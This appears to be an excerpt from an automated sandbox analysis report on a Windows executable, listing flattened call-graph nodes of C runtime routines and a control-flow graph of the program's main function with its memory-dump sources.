18720->18721 18721->18711 18722->18719 18724 7ff69f40039f 18723->18724 18725 7ff69f4003bc 18723->18725 18724->18581 18726 7ff69f3fdea8 _get_daylight 11 API calls 18725->18726 18732 7ff69f4003e0 18726->18732 18727 7ff69f400441 18729 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18727->18729 18728 7ff69f3f9814 __CxxCallCatchBlock 45 API calls 18730 7ff69f40046a 18728->18730 18729->18724 18731 7ff69f3fdea8 _get_daylight 11 API calls 18731->18732 18732->18727 18732->18731 18733 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18732->18733 18734 7ff69f3ff784 37 API calls 18732->18734 18735 7ff69f400450 18732->18735 18737 7ff69f400464 18732->18737 18733->18732 18734->18732 18736 7ff69f3f9c10 _isindst 17 API calls 18735->18736 18736->18737 18737->18728 18739 7ff69f3f8a24 18738->18739 18743 7ff69f3f8a2d 18738->18743 18739->18743 19084 7ff69f3f8524 18739->19084 18743->18597 18743->18598 18745 7ff69f406309 18744->18745 18748 7ff69f406336 18744->18748 18746 7ff69f40630e 18745->18746 18745->18748 18747 7ff69f3f43f4 _get_daylight 11 API calls 18746->18747 18750 7ff69f406313 18747->18750 18749 7ff69f40637a 18748->18749 18752 7ff69f406399 18748->18752 18766 7ff69f40636e __crtLCMapStringW 18748->18766 18751 7ff69f3f43f4 _get_daylight 11 API calls 18749->18751 18753 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18750->18753 18754 7ff69f40637f 18751->18754 18755 7ff69f4063b5 18752->18755 18756 7ff69f4063a3 18752->18756 18757 7ff69f40631e 18753->18757 18759 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18754->18759 18758 7ff69f3f4178 45 API calls 18755->18758 18760 7ff69f3f43f4 _get_daylight 11 API calls 18756->18760 18757->18591 18761 7ff69f4063c2 18758->18761 18759->18766 18762 7ff69f4063a8 18760->18762 18761->18766 19131 7ff69f407e18 18761->19131 18763 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18762->18763 18763->18766 18766->18591 18767 7ff69f3f43f4 _get_daylight 11 API calls 18767->18766 18769 7ff69f406fa3 18768->18769 18770 7ff69f406f99 18768->18770 18772 7ff69f406fa8 18769->18772 18778 7ff69f406faf _get_daylight 18769->18778 18771 7ff69f3fc90c _fread_nolock 12 API calls 18770->18771 18777 7ff69f406fa1 18771->18777 18775 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18772->18775 18773 7ff69f406fb5 18776 7ff69f3f43f4 _get_daylight 11 API calls 18773->18776 18774 7ff69f406fe2 RtlReAllocateHeap 18774->18777 18774->18778 18775->18777 18776->18777 18777->18646 18778->18773 18778->18774 18779 7ff69f4028a0 _get_daylight 2 API calls 18778->18779 18779->18778 18781 7ff69f406f51 18780->18781 18782 7ff69f406f6a HeapSize 18780->18782 18783 7ff69f3f43f4 _get_daylight 11 API calls 18781->18783 18784 7ff69f406f56 18783->18784 18785 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18784->18785 18786 7ff69f406f61 18785->18786 18786->18642 18788 7ff69f3f84c5 18787->18788 18789 7ff69f3f84c9 18787->18789 18788->18663 18802 7ff69f3f8804 18788->18802 18810 7ff69f401900 18789->18810 18794 7ff69f3f84db 18796 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18794->18796 18795 7ff69f3f84e7 18836 7ff69f3f8594 18795->18836 18796->18788 18799 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18800 7ff69f3f850e 18799->18800 18801 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18800->18801 18801->18788 18803 7ff69f3f882d 18802->18803 18808 7ff69f3f8846 18802->18808 18803->18663 18804 7ff69f3fdea8 _get_daylight 11 API calls 18804->18808 18805 7ff69f3f88d6 18807 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18805->18807 18806 7ff69f3ffaf8 WideCharToMultiByte 18806->18808 18807->18803 18808->18803 18808->18804 18808->18805 18808->18806 18809 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18808->18809 18809->18808 18811 7ff69f40190d 18810->18811 18812 7ff69f3f84ce 18810->18812 18855 7ff69f3fa534 18811->18855 18816 7ff69f401c3c GetEnvironmentStringsW 18812->18816 18817 7ff69f3f84d3 18816->18817 18818 7ff69f401c6c 18816->18818 18817->18794 18817->18795 18819 7ff69f3ffaf8 WideCharToMultiByte 18818->18819 18820 7ff69f401cbd 18819->18820 18821 7ff69f401cc4 FreeEnvironmentStringsW 18820->18821 18822 7ff69f3fc90c _fread_nolock 12 API calls 18820->18822 18821->18817 18823 7ff69f401cd7 18822->18823 18824 7ff69f401cdf 18823->18824 18825 7ff69f401ce8 18823->18825 18826 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18824->18826 18827 7ff69f3ffaf8 WideCharToMultiByte 18825->18827 18828 7ff69f401ce6 18826->18828 18829 7ff69f401d0b 18827->18829 18828->18821 18830 7ff69f401d0f 18829->18830 18831 7ff69f401d19 18829->18831 18832 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18830->18832 18833 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18831->18833 18834 7ff69f401d17 FreeEnvironmentStringsW 18832->18834 18833->18834 18834->18817 18837 7ff69f3f85b9 18836->18837 18838 7ff69f3fdea8 _get_daylight 11 API calls 18837->18838 18850 7ff69f3f85ef 18838->18850 18839 7ff69f3f85f7 18840 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18839->18840 18841 7ff69f3f84ef 18840->18841 18841->18799 18842 7ff69f3f866a 18843 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18842->18843 18843->18841 18844 7ff69f3fdea8 _get_daylight 11 API calls 18844->18850 18845 7ff69f3f8659 19004 7ff69f3f87c0 18845->19004 18846 7ff69f3f97b4 __std_exception_copy 37 API calls 18846->18850 18849 7ff69f3f868f 18852 7ff69f3f9c10 _isindst 17 API calls 18849->18852 18850->18839 18850->18842 18850->18844 18850->18845 18850->18846 18850->18849 18853 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18850->18853 18851 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18851->18839 18854 7ff69f3f86a2 18852->18854 18853->18850 18856 7ff69f3fa545 FlsGetValue 18855->18856 18857 7ff69f3fa560 FlsSetValue 18855->18857 18858 7ff69f3fa552 18856->18858 18860 7ff69f3fa55a 18856->18860 18857->18858 18859 7ff69f3fa56d 18857->18859 18861 7ff69f3f9814 __CxxCallCatchBlock 45 API calls 18858->18861 18865 7ff69f3fa558 18858->18865 18862 7ff69f3fdea8 _get_daylight 11 API calls 18859->18862 18860->18857 18863 7ff69f3fa5d5 18861->18863 18864 7ff69f3fa57c 18862->18864 18866 7ff69f3fa59a FlsSetValue 18864->18866 18867 7ff69f3fa58a FlsSetValue 18864->18867 18875 7ff69f4015d4 18865->18875 18869 7ff69f3fa5b8 18866->18869 18870 7ff69f3fa5a6 FlsSetValue 18866->18870 18868 7ff69f3fa593 18867->18868 18871 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18868->18871 18872 7ff69f3fa204 _get_daylight 11 API calls 18869->18872 18870->18868 18871->18858 18873 7ff69f3fa5c0 18872->18873 18874 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18873->18874 18874->18865 18898 7ff69f401844 18875->18898 18877 7ff69f401609 18913 7ff69f4012d4 18877->18913 18880 7ff69f3fc90c _fread_nolock 12 API calls 18881 7ff69f401637 18880->18881 18882 7ff69f40163f 18881->18882 18884 7ff69f40164e 18881->18884 18883 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18882->18883 18897 7ff69f401626 18883->18897 18884->18884 18920 7ff69f40197c 18884->18920 18887 7ff69f40174a 18888 7ff69f3f43f4 _get_daylight 11 API calls 18887->18888 18891 7ff69f40174f 18888->18891 18889 7ff69f4017a5 18892 7ff69f40180c 18889->18892 18931 7ff69f401104 18889->18931 18890 7ff69f401764 18890->18889 18894 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18890->18894 18893 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18891->18893 18896 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18892->18896 18893->18897 18894->18889 18896->18897 18897->18812 18899 7ff69f401867 18898->18899 18902 7ff69f401871 18899->18902 18946 7ff69f3ff5e8 EnterCriticalSection 18899->18946 18901 7ff69f4018e3 18901->18877 18902->18901 18904 7ff69f3f9814 __CxxCallCatchBlock 45 API calls 18902->18904 18906 7ff69f4018fb 18904->18906 18908 7ff69f401952 18906->18908 18910 7ff69f3fa534 50 API calls 18906->18910 18908->18877 18911 7ff69f40193c 18910->18911 18912 7ff69f4015d4 65 API calls 18911->18912 18912->18908 18914 7ff69f3f4178 45 API calls 18913->18914 18915 7ff69f4012e8 18914->18915 18916 7ff69f4012f4 GetOEMCP 18915->18916 18917 7ff69f401306 18915->18917 18918 7ff69f40131b 18916->18918 18917->18918 18919 7ff69f40130b GetACP 18917->18919 18918->18880 18918->18897 18919->18918 18921 7ff69f4012d4 47 API calls 18920->18921 18922 7ff69f4019a9 18921->18922 18923 7ff69f401aff 18922->18923 18925 7ff69f4019e6 IsValidCodePage 18922->18925 18929 7ff69f401a00 __scrt_get_show_window_mode 18922->18929 18924 7ff69f3eb870 _log10_special 8 API calls 18923->18924 18926 7ff69f401741 18924->18926 18925->18923 18927 7ff69f4019f7 18925->18927 18926->18887 18926->18890 18928 7ff69f401a26 GetCPInfo 18927->18928 18927->18929 18928->18923 18928->18929 18947 7ff69f4013ec 18929->18947 19003 7ff69f3ff5e8 EnterCriticalSection 18931->19003 18948 7ff69f401429 GetCPInfo 18947->18948 18949 7ff69f40151f 18947->18949 18948->18949 18954 7ff69f40143c 18948->18954 18950 7ff69f3eb870 _log10_special 8 API calls 18949->18950 18952 7ff69f4015be 18950->18952 18951 7ff69f402150 48 API calls 18953 7ff69f4014b3 18951->18953 18952->18923 18958 7ff69f406e94 18953->18958 18954->18951 18957 7ff69f406e94 54 API calls 18957->18949 18959 7ff69f3f4178 45 API calls 18958->18959 18960 7ff69f406eb9 18959->18960 18963 7ff69f406b60 18960->18963 18964 7ff69f406ba1 18963->18964 18965 7ff69f3febb0 _fread_nolock MultiByteToWideChar 18964->18965 18969 7ff69f406beb 18965->18969 18966 7ff69f406e69 18968 7ff69f3eb870 _log10_special 8 API calls 18966->18968 18967 7ff69f406d21 18967->18966 18972 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18967->18972 18970 7ff69f4014e6 18968->18970 18969->18966 18969->18967 18971 7ff69f3fc90c _fread_nolock 12 API calls 18969->18971 18973 7ff69f406c23 18969->18973 18970->18957 18971->18973 18972->18966 18973->18967 18974 7ff69f3febb0 _fread_nolock MultiByteToWideChar 18973->18974 18975 7ff69f406c96 18974->18975 18975->18967 18994 7ff69f3fe3f4 18975->18994 18978 7ff69f406d32 18980 7ff69f3fc90c _fread_nolock 12 API calls 18978->18980 18982 7ff69f406e04 18978->18982 18984 7ff69f406d50 18978->18984 18979 7ff69f406ce1 18979->18967 18981 7ff69f3fe3f4 __crtLCMapStringW 6 API calls 18979->18981 18980->18984 18981->18967 18982->18967 18983 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18982->18983 18983->18967 18984->18967 18985 7ff69f3fe3f4 __crtLCMapStringW 6 API calls 18984->18985 18986 7ff69f406dd0 18985->18986 18986->18982 18987 7ff69f406df0 18986->18987 18988 7ff69f406e06 18986->18988 18989 7ff69f3ffaf8 WideCharToMultiByte 18987->18989 18990 7ff69f3ffaf8 WideCharToMultiByte 18988->18990 18991 7ff69f406dfe 18989->18991 18990->18991 18991->18982 18992 7ff69f406e1e 18991->18992 18992->18967 18993 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18992->18993 18993->18967 18995 7ff69f3fe020 __crtLCMapStringW 5 API calls 18994->18995 18996 7ff69f3fe432 18995->18996 18998 7ff69f3fe43a 18996->18998 19000 7ff69f3fe4e0 18996->19000 18998->18967 18998->18978 18998->18979 18999 7ff69f3fe4a3 LCMapStringW 18999->18998 19001 7ff69f3fe020 __crtLCMapStringW 5 API calls 19000->19001 19002 7ff69f3fe50e __crtLCMapStringW 19001->19002 19002->18999 19005 7ff69f3f87c5 19004->19005 19006 7ff69f3f8661 19004->19006 19007 7ff69f3f87ee 19005->19007 19008 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19005->19008 19006->18851 19009 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19007->19009 19008->19005 19009->19006 19011 7ff69f4055d1 19010->19011 19012 7ff69f4055e8 19010->19012 19013 7ff69f3f43f4 _get_daylight 11 API calls 19011->19013 19012->19011 19015 7ff69f4055f6 19012->19015 19014 7ff69f4055d6 19013->19014 19016 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 19014->19016 19017 7ff69f3f4178 45 API calls 19015->19017 19018 7ff69f4055e1 19015->19018 19016->19018 19017->19018 19018->18677 19020 7ff69f3f4178 45 API calls 19019->19020 19021 7ff69f408281 19020->19021 19024 7ff69f407ed8 19021->19024 19026 7ff69f407f26 19024->19026 19025 7ff69f3eb870 _log10_special 8 API calls 19027 7ff69f406515 19025->19027 19028 7ff69f407fad 19026->19028 19030 7ff69f407f98 GetCPInfo 19026->19030 19033 7ff69f407fb1 19026->19033 19027->18677 19027->18703 19029 7ff69f3febb0 _fread_nolock MultiByteToWideChar 19028->19029 19028->19033 19031 7ff69f408045 19029->19031 19030->19028 19030->19033 19032 7ff69f3fc90c _fread_nolock 12 API calls 19031->19032 19031->19033 19034 7ff69f40807c 19031->19034 19032->19034 19033->19025 19034->19033 19035 7ff69f3febb0 _fread_nolock MultiByteToWideChar 19034->19035 19036 7ff69f4080ea 19035->19036 19037 7ff69f4081cc 19036->19037 19038 7ff69f3febb0 _fread_nolock MultiByteToWideChar 19036->19038 19037->19033 19039 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19037->19039 19040 7ff69f408110 19038->19040 19039->19033 19040->19037 19041 7ff69f3fc90c _fread_nolock 12 API calls 19040->19041 19042 7ff69f40813d 19040->19042 19041->19042 19042->19037 19043 7ff69f3febb0 _fread_nolock MultiByteToWideChar 19042->19043 19044 7ff69f4081b4 19043->19044 19045 7ff69f4081ba 19044->19045 19046 7ff69f4081d4 19044->19046 19045->19037 19049 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19045->19049 19053 7ff69f3fe278 19046->19053 19049->19037 19050 7ff69f408213 19050->19033 19052 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19050->19052 19051 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19051->19050 19052->19033 19054 7ff69f3fe020 __crtLCMapStringW 5 API calls 19053->19054 19055 7ff69f3fe2b6 19054->19055 19056 7ff69f3fe4e0 __crtLCMapStringW 5 API calls 19055->19056 19058 7ff69f3fe2be 19055->19058 19057 7ff69f3fe327 CompareStringW 19056->19057 19057->19058 19058->19050 19058->19051 19060 7ff69f3fe020 __crtLCMapStringW 5 API calls 19059->19060 19061 7ff69f3fe254 19060->19061 19061->18708 19063 7ff69f3f480a 19062->19063 19064 7ff69f3f47e6 19062->19064 19065 7ff69f3f4864 19063->19065 19066 7ff69f3f480f 19063->19066 19068 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19064->19068 19071 7ff69f3f47f5 19064->19071 19067 7ff69f3febb0 _fread_nolock MultiByteToWideChar 19065->19067 19069 7ff69f3f4824 19066->19069 19066->19071 19072 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19066->19072 19078 7ff69f3f4880 19067->19078 19068->19071 19073 7ff69f3fc90c _fread_nolock 12 API calls 19069->19073 19070 7ff69f3f4887 GetLastError 19074 7ff69f3f4368 _fread_nolock 11 API calls 19070->19074 19071->18711 19071->18712 19072->19069 19073->19071 19077 7ff69f3f4894 19074->19077 19075 7ff69f3f48c2 19075->19071 19076 7ff69f3febb0 _fread_nolock MultiByteToWideChar 19075->19076 19081 7ff69f3f4906 19076->19081 19082 7ff69f3f43f4 _get_daylight 11 API calls 19077->19082 19078->19070 19078->19075 19079 7ff69f3f48b5 19078->19079 19083 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19078->19083 19080 7ff69f3fc90c _fread_nolock 12 API calls 19079->19080 19080->19075 19081->19070 19081->19071 19082->19071 19083->19079 19085 7ff69f3f853d 19084->19085 19096 7ff69f3f8539 19084->19096 19105 7ff69f401d4c GetEnvironmentStringsW 19085->19105 19088 7ff69f3f854a 19090 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19088->19090 19089 7ff69f3f8556 19112 7ff69f3f86a4 19089->19112 19090->19096 19093 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19094 7ff69f3f857d 19093->19094 19095 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19094->19095 19095->19096 19096->18743 19097 7ff69f3f88e4 19096->19097 19098 7ff69f3f8907 19097->19098 19103 7ff69f3f891e 19097->19103 19098->18743 19099 7ff69f3febb0 MultiByteToWideChar _fread_nolock 19099->19103 19100 7ff69f3fdea8 _get_daylight 11 API calls 19100->19103 19101 7ff69f3f8992 19102 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19101->19102 19102->19098 19103->19098 19103->19099 19103->19100 19103->19101 19104 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19103->19104 19104->19103 19106 7ff69f3f8542 19105->19106 19107 7ff69f401d70 19105->19107 19106->19088 19106->19089 19108 7ff69f3fc90c _fread_nolock 12 API calls 19107->19108 19110 7ff69f401da7 memcpy_s 19108->19110 19109 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19111 7ff69f401dc7 FreeEnvironmentStringsW 19109->19111 19110->19109 19111->19106 19113 7ff69f3f86cc 19112->19113 19114 7ff69f3fdea8 _get_daylight 11 API calls 19113->19114 19126 7ff69f3f8707 19114->19126 19115 7ff69f3f870f 19116 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19115->19116 19117 7ff69f3f855e 19116->19117 19117->19093 19118 7ff69f3f8789 19119 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19118->19119 19119->19117 19120 7ff69f3fdea8 _get_daylight 11 API calls 19120->19126 19121 7ff69f3f8778 19122 7ff69f3f87c0 11 API calls 19121->19122 19124 7ff69f3f8780 19122->19124 19123 7ff69f3ff784 37 API calls 19123->19126 19127 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19124->19127 19125 7ff69f3f87ac 19129 7ff69f3f9c10 _isindst 17 API calls 19125->19129 19126->19115 19126->19118 19126->19120 19126->19121 19126->19123 19126->19125 19128 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19126->19128 19127->19115 19128->19126 19130 7ff69f3f87be 19129->19130 19132 7ff69f407e41 __crtLCMapStringW 19131->19132 19133 7ff69f3fe278 6 API calls 19132->19133 19134 7ff69f4063fe 19132->19134 19133->19134 19134->18766 19134->18767 20180 7ff69f409ef3 20181 7ff69f409f03 20180->20181 20184 7ff69f3f4788 LeaveCriticalSection 20181->20184 19710 7ff69f3ebe70 19711 7ff69f3ebe80 19710->19711 19727 7ff69f3f8ec0 19711->19727 19713 7ff69f3ebe8c 19733 7ff69f3ec168 19713->19733 19715 7ff69f3ebea4 _RTC_Initialize 19725 7ff69f3ebef9 19715->19725 19738 7ff69f3ec318 19715->19738 19716 7ff69f3ec44c 7 API calls 19717 7ff69f3ebf25 19716->19717 19719 7ff69f3ebeb9 19741 7ff69f3f832c 19719->19741 19725->19716 19726 7ff69f3ebf15 19725->19726 19728 7ff69f3f8ed1 19727->19728 19729 7ff69f3f43f4 _get_daylight 11 API calls 19728->19729 19732 7ff69f3f8ed9 19728->19732 19730 7ff69f3f8ee8 19729->19730 19731 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 19730->19731 19731->19732 19732->19713 19734 7ff69f3ec179 19733->19734 19737 7ff69f3ec17e __scrt_release_startup_lock 19733->19737 19735 7ff69f3ec44c 7 API calls 19734->19735 19734->19737 19736 7ff69f3ec1f2 19735->19736 19737->19715 19766 7ff69f3ec2dc 19738->19766 19740 7ff69f3ec321 19740->19719 19742 7ff69f3f834c 19741->19742 19749 7ff69f3ebec5 19741->19749 19743 7ff69f3f8354 19742->19743 19744 7ff69f3f836a GetModuleFileNameW 19742->19744 19745 7ff69f3f43f4 _get_daylight 11 API calls 19743->19745 19747 7ff69f3f8395 19744->19747 19746 7ff69f3f8359 19745->19746 19748 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 19746->19748 19750 7ff69f3f82cc 11 API calls 19747->19750 19748->19749 19749->19725 19765 7ff69f3ec3ec InitializeSListHead 19749->19765 19751 7ff69f3f83d5 19750->19751 19752 7ff69f3f83dd 19751->19752 19756 7ff69f3f83f5 19751->19756 19753 7ff69f3f43f4 _get_daylight 11 API calls 19752->19753 19754 7ff69f3f83e2 19753->19754 19755 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19754->19755 19755->19749 19757 7ff69f3f8417 19756->19757 19759 7ff69f3f8443 19756->19759 19760 7ff69f3f845c 19756->19760 19758 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19757->19758 19758->19749 19761 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19759->19761 19763 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19760->19763 19762 7ff69f3f844c 19761->19762 19764 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19762->19764 19763->19757 19764->19749 19767 7ff69f3ec2f6 19766->19767 19769 7ff69f3ec2ef 19766->19769 19770 7ff69f3f94fc 19767->19770 19769->19740 19773 7ff69f3f9138 19770->19773 19780 7ff69f3ff5e8 EnterCriticalSection 19773->19780

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF69F3E1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 7ff69f3e1000-7ff69f3e3536 call 7ff69f3ef138 call 7ff69f3ef140 call 7ff69f3ebb70 call 7ff69f3f4700 call 7ff69f3f4794 call 7ff69f3e33e0 14 7ff69f3e3544-7ff69f3e3566 call 7ff69f3e18f0 0->14 15 7ff69f3e3538-7ff69f3e353f 0->15 21 7ff69f3e356c-7ff69f3e3583 call 7ff69f3e1bf0 14->21 22 7ff69f3e3736-7ff69f3e374c call 7ff69f3e3f70 14->22 16 7ff69f3e371a-7ff69f3e3735 call 7ff69f3eb870 15->16 25 7ff69f3e3588-7ff69f3e35c1 21->25 29 7ff69f3e3785-7ff69f3e379a call 7ff69f3e25f0 22->29 30 7ff69f3e374e-7ff69f3e377b call 7ff69f3e76a0 22->30 27 7ff69f3e3653-7ff69f3e366d call 7ff69f3e7e10 25->27 28 7ff69f3e35c7-7ff69f3e35cb 25->28 44 7ff69f3e3695-7ff69f3e369c 27->44 45 7ff69f3e366f-7ff69f3e3675 27->45 32 7ff69f3e35cd-7ff69f3e35e5 call 7ff69f3f4560 28->32 33 7ff69f3e3638-7ff69f3e364d call 7ff69f3e18e0 28->33 47 7ff69f3e3712 29->47 41 7ff69f3e379f-7ff69f3e37be call 7ff69f3e1bf0 30->41 42 7ff69f3e377d-7ff69f3e3780 call 7ff69f3ef36c 30->42 52 7ff69f3e35f2-7ff69f3e360a call 7ff69f3f4560 32->52 53 7ff69f3e35e7-7ff69f3e35eb 32->53 33->27 33->28 61 7ff69f3e37c1-7ff69f3e37ca 41->61 42->29 54 7ff69f3e36a2-7ff69f3e36c0 call 7ff69f3e7e10 call 7ff69f3e7f80 44->54 55 7ff69f3e3844-7ff69f3e3863 call 7ff69f3e3e90 44->55 50 7ff69f3e3682-7ff69f3e3690 call 7ff69f3f415c 45->50 51 7ff69f3e3677-7ff69f3e3680 45->51 47->16 50->44 51->50 66 7ff69f3e360c-7ff69f3e3610 52->66 67 7ff69f3e3617-7ff69f3e362f call 7ff69f3f4560 52->67 53->52 80 7ff69f3e380f-7ff69f3e381e call 7ff69f3e8400 54->80 81 7ff69f3e36c6-7ff69f3e36c9 54->81 69 7ff69f3e3865-7ff69f3e386f call 7ff69f3e3fe0 55->69 70 7ff69f3e3871-7ff69f3e3882 call 7ff69f3e1bf0 55->70 61->61 65 7ff69f3e37cc-7ff69f3e37e9 call 7ff69f3e18f0 61->65 65->25 85 7ff69f3e37ef-7ff69f3e3800 call 7ff69f3e25f0 65->85 66->67 67->33 86 7ff69f3e3631 67->86 77 7ff69f3e3887-7ff69f3e38a1 call 7ff69f3e86b0 69->77 70->77 94 7ff69f3e38a3 77->94 95 7ff69f3e38af-7ff69f3e38c1 SetDllDirectoryW 77->95 92 7ff69f3e3820 80->92 93 7ff69f3e382c-7ff69f3e382f call 7ff69f3e7c40 80->93 81->80 82 7ff69f3e36cf-7ff69f3e36f6 call 7ff69f3e1bf0 81->82 97 7ff69f3e3805-7ff69f3e380d call 7ff69f3f415c 82->97 98 7ff69f3e36fc-7ff69f3e3703 call 7ff69f3e25f0 82->98 85->47 86->33 92->93 104 7ff69f3e3834-7ff69f3e3836 93->104 94->95 100 7ff69f3e38c3-7ff69f3e38ca 95->100 101 7ff69f3e38d0-7ff69f3e38ec call 7ff69f3e6560 call 7ff69f3e6b00 95->101 97->77 108 7ff69f3e3708-7ff69f3e370a 98->108 100->101 105 7ff69f3e3a50-7ff69f3e3a58 100->105 117 7ff69f3e38ee-7ff69f3e38f4 101->117 118 7ff69f3e3947-7ff69f3e394a call 7ff69f3e6510 101->118 104->77 111 7ff69f3e3838 104->111 109 7ff69f3e3a5a-7ff69f3e3a77 PostMessageW GetMessageW 105->109 110 7ff69f3e3a7d-7ff69f3e3aaf call 7ff69f3e33d0 call 7ff69f3e3080 call 7ff69f3e33a0 call 7ff69f3e6780 call 7ff69f3e6510 105->110 108->47 109->110 111->55 120 7ff69f3e390e-7ff69f3e3918 call 7ff69f3e6970 117->120 121 7ff69f3e38f6-7ff69f3e3903 call 7ff69f3e65a0 117->121 125 7ff69f3e394f-7ff69f3e3956 118->125 134 7ff69f3e3923-7ff69f3e3931 call 7ff69f3e6cd0 120->134 135 7ff69f3e391a-7ff69f3e3921 120->135 121->120 132 7ff69f3e3905-7ff69f3e390c 121->132 125->105 129 7ff69f3e395c-7ff69f3e3966 call 7ff69f3e30e0 125->129 129->108 142 7ff69f3e396c-7ff69f3e3980 call 7ff69f3e83e0 129->142 138 7ff69f3e393a-7ff69f3e3942 call 7ff69f3e2870 call 7ff69f3e6780 132->138 134->125 147 7ff69f3e3933 134->147 135->138 138->118 151 7ff69f3e3982-7ff69f3e399f PostMessageW GetMessageW 142->151 152 7ff69f3e39a5-7ff69f3e39e1 call 7ff69f3e7f20 call 7ff69f3e7fc0 call 7ff69f3e6780 call 7ff69f3e6510 call 7ff69f3e7ec0 142->152 147->138 151->152 162 7ff69f3e39e6-7ff69f3e39e8 152->162 163 7ff69f3e39ea-7ff69f3e3a00 call 7ff69f3e81f0 call 7ff69f3e7ec0 162->163 164 7ff69f3e3a3d-7ff69f3e3a4b call 7ff69f3e18a0 162->164 163->164 171 7ff69f3e3a02-7ff69f3e3a10 163->171 164->108 172 7ff69f3e3a12-7ff69f3e3a2c call 7ff69f3e25f0 call 7ff69f3e18a0 171->172 173 7ff69f3e3a31-7ff69f3e3a38 call 7ff69f3e2870 171->173 172->108 173->164
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
